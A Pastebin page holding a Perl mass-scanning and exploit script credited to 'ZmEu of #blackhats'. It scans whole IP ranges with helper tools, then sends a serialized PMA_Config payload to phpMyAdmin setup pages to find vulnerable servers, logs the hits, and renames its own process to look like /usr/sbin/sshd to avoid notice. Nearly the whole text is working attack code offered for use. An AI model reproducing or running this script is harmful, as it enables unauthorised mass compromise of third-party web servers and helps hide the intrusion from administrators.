SHARE
TWEET

Untitled

a guest Sep 13th, 2017 85 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. # MODULES
  4.  
  5. #use warnings;
  6. use Parallel::ForkManager;
  7. use IO::Socket;
  8. use URI::_foreign;
  9. use URI::_generic;
  10. use URI::_query;
  11. require URI::_foreign;
  12. use URI;
  13. use LWP;
  14. use LWP::Simple;
  15. use LWP::UserAgent;
  16. use LWP::Protocol::http;
  17. use URI::http;
  18. use HTTP::Cookies;
  19. use HTTP::Request::Common qw(POST);
  20. use HTTP::Headers;
  21. use HTML::Parser;
  22. use Parallel::ForkManager;
  23. use IO::Socket;
  24. use LWP::Simple;
  25. use LWP::UserAgent;
  26. use HTTP::Cookies;
  27. use HTTP::Request::Common qw(POST);
  28. use HTTP::Headers;
  29. use Getopt::Long;
  30. use Time::HiRes qw(gettimeofday);
  31. use MIME::Base64;
  32.  
  33. #use strict;
  34. my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
  35. my $hostfile="vuln.txt";
  36. my $word=".dsf";
  37. my $maximumprocess="290";
  38. my $hiddenprocess='/usr/sbin/sshd                                                                                                              ';
  39. my $eth="eth0";
  40. my $spd='27';
  41. my $scanclassb;
  42. my $scanclassa;
  43. my $explhost;
  44. my $explpayhost;
  45. my $explpayloadfile;
  46.  
  47. GetOptions(
  48.     'exploit|x' => \&exploit,
  49.         'h|hostfile=s'    => \$hostfile,
  50.         'p|paths=s' => \$word,
  51.         't|threads=s'      => \$maximumprocess,
  52.         'help'        => \&usage,
  53.         'hide=s'                => \$hiddenprocess,
  54.         'b=s'           => \$scanclassb,
  55.         'a=s'           => \$scanclassa,
  56.         'i=s'           => \$eth,
  57.         'spd=s'         => \$spd,
  58.         'r'             => \&rev,
  59.     'host=s'    => \$explpayhost,
  60.     'clean|sterge' => \&sterge,
  61. );
  62.  
  63. $0="$hiddenprocess";
  64.  
  65. sub rev {
  66. our $reverse='on';
  67.  
  68. }
  69. if ($explhost) {
  70. shell("$explhost");
  71. }
  72. elsif ($scanclassb) {
  73. scanb("$scanclassb","$eth","$spd","$reverse");
  74. }
  75. elsif ($scanclassa) {
  76. scana("$scanclassa","$eth","$spd","$reverse");
  77. }
  78. elsif (($explpayloadfile) && $explpayhost) {
  79. payload_exec("$explpayhost","$explpayloadfile");
  80. }
  81.  
  82. if ( !-e $word ) {
  83.         die "\e[37;1m[\e[32;1m+\e[37;1m] \e[1;31;1mCRITICAL! Paths file does not seem to exist: $word\e[0m\n";
  84.  
  85. }
  86.  
  87. if ( !-e $hostfile ) {
  88.         die "\e[37;1m[\e[32;1m+\e[37;1m] \e[1;31;1mCRITICAL! Host file does not seem to exist: $hostfile\e[0m\n";
  89.  
  90. }
  91.  
  92. sub usage {
  93. print ("\e[37;1m[\e[32;1m+\e[37;1m] \e[1;31;1mSyntax: $0 .. READ THE FUCKING MANUAL K1DD0ZZ=]\e[0m\n\n");
  94. exit;
  95. }
  96.  
  97. sub exploit {
  98. my $total = `grep -c . $hostfile`;
  99. chomp($total);
  100. my $curhost = 0;
  101. my $forkmanager = new Parallel::ForkManager($maximumprocess);
  102. open(my $hostfileh, "<" . $hostfile);
  103. while (<$hostfileh>) {
  104. my $host = $_;
  105. $host =~ s/\x0a//g;
  106. chomp($host);
  107. $curhost = $curhost + 1;
  108. chomp($curhost);
  109. print qq (\e[37;1m[\e[32;1m+\e[37;1m]\e[32;1mEXPLOIT\e[37;1m -> \e[31;1m$host \e[34;1m[\e[37;1m$curhost of \e[37;1m$total\e[34;1m]\e[0m\n);
  110. open(my $wordh, "<" . $word);
  111. while (<$wordh>) {
  112. my $path = $_;
  113. $path =~ s/\x0a//g;
  114. chomp($path);
  115. my $processid = $forkmanager->start() and next;
  116. my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
  117. my $url = $host;
  118. my $ftp = "";
  119. my $len = length($ftp);
  120. my $code = "a:1:\{i:0\;O:10:\"PMA_Config\":1:\{s:6:\"source\"\;s:" . $len . ":\"". $ftp ."\"\;\}\}";
  121. $code =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
  122. my $cookie = HTTP::Cookies->new;
  123. my $token;
  124. my $req = HTTP::Request->new("GET", $url);
  125. my $res = $ua->request($req);
  126. if ($res->is_success) {
  127. $join = join("",$res->as_string);
  128. if ($token=$join=~m#name="token" value="(.+?)"#sg) {
  129. $token = $1;
  130. }
  131. else {
  132. #print ("[=]fix pula");
  133. }
  134. }
  135. $cookie->extract_cookies($res);
  136. $attempt = "action=lay_navigation&eoltype=unix&token=" . $token . "&configuration=" . $code;
  137. $req = HTTP::Request->new("POST", $url);
  138. $cookie->add_cookie_header($req);
  139. $req->header(Referer => $url);
  140. $req->content_type('application/x-www-form-urlencoded');
  141. $req->content($attempt);
  142. $res = $ua->request($req);
  143. my $data = $res->as_string;
  144.  
  145. #print $data;
  146. #if ( $data =~ m#zmeu_start(.+?)zmeu_end#sg )
  147. if ( $data =~ m#500(.+?)#sg )
  148. {
  149. open(OUT, ">>.session.log");
  150. print OUT ("$host\n");
  151. close OUT;
  152. print("\e[37;1m[\e[32;1m+\e[37;1m]\e[32;1mMACHINE VULNERABLE\e[1;37;1m -> $host \e[0m\n");
  153. }
  154. $forkmanager->finish();
  155. }
  156. close($wordh);
  157. }
  158. close($hostfileh);
  159. $forkmanager->wait_all_children();
  160. }
  161.  
  162. sub scana {
  163. my $classa=$_[0];
  164. my $interface=$_[1];
  165. my $speed=$_[2];
  166. my $reverse=$_[3];
  167. print ("[=]pma massscan by ZmEu of #blackhats @ Foonet\n[=]Greetz to everyone i know release date: 18/02/2011\nReverse ip mode: $reverse\n");
  168. system("rm -f bios.txt ips.txt urls.txt urlz.txt vuln.txt");
  169. system("./ss 80 -a $classa -i $interface -s $speed");
  170. system("sort -u bios.txt > ips.txt");
  171. system("./bing ips.txt");
  172. system("sort -u urls.txt > urlz.txt");
  173. system("./zmeu urlz.txt vuln.txt cgi $maximumprocess");
  174. #if ($reverse eq "on") {
  175. #&startrev();
  176. #exit;
  177. #}
  178. #else {
  179. &exploit();
  180. exit;
  181. #}
  182. #exit;
  183. }
  184.  
  185. sub scanb {
  186. my $classb=$_[0];
  187. my $interface=$_[1];
  188. my $speed=$_[2];
  189. my $reverse=$_[3];
  190. print ("[=]pma massscan by ZmEu of #blackhats @ Foonet\n[=]Greetz to everyone i know release date: 18/02/2011\nReverse ip mode: $reverse\n");
  191. system("rm -f bios.txt ips.txt urls.txt urlz.txt vuln.txt");
  192. system("./ss 80 -b $classb -i $interface -s $speed");
  193. system("sort -u bios.txt > ips.txt");
  194. system("./bing ips.txt");
  195. system("sort -u urls.txt > urlz.txt");
  196. system("./zmeu urlz.txt vuln.txt cgi $maximumprocess");
  197. #if ($reverse eq "on") {
  198. #&startrev();
  199. #exit;
  200. #}
  201. #else {
  202. &exploit();
  203. exit;
  204. #}
  205. #exit;
  206. }
  207.  
  208. sub sterge {
  209. system("rm -f *.txt");
  210. exit;
  211. }
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top